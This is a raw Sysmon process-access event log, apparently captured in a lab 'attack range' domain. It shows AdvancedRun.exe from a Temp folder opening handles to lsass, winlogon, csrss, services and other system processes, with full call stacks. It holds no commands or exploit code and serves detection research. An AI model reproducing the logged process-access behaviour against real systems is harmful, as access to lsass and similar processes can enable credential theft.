18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004008563Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008562Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008561Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008560Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008559Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008558Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008557Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008556Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004008555Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft 
WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004008554Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008483Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4285040C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008482Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008481Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4285040C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008480Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4285040C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008477Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008476Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008475Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:43.097{834264DD-DB11-61EA-9500-000000002702}4284864C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008474Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.082{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008473Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
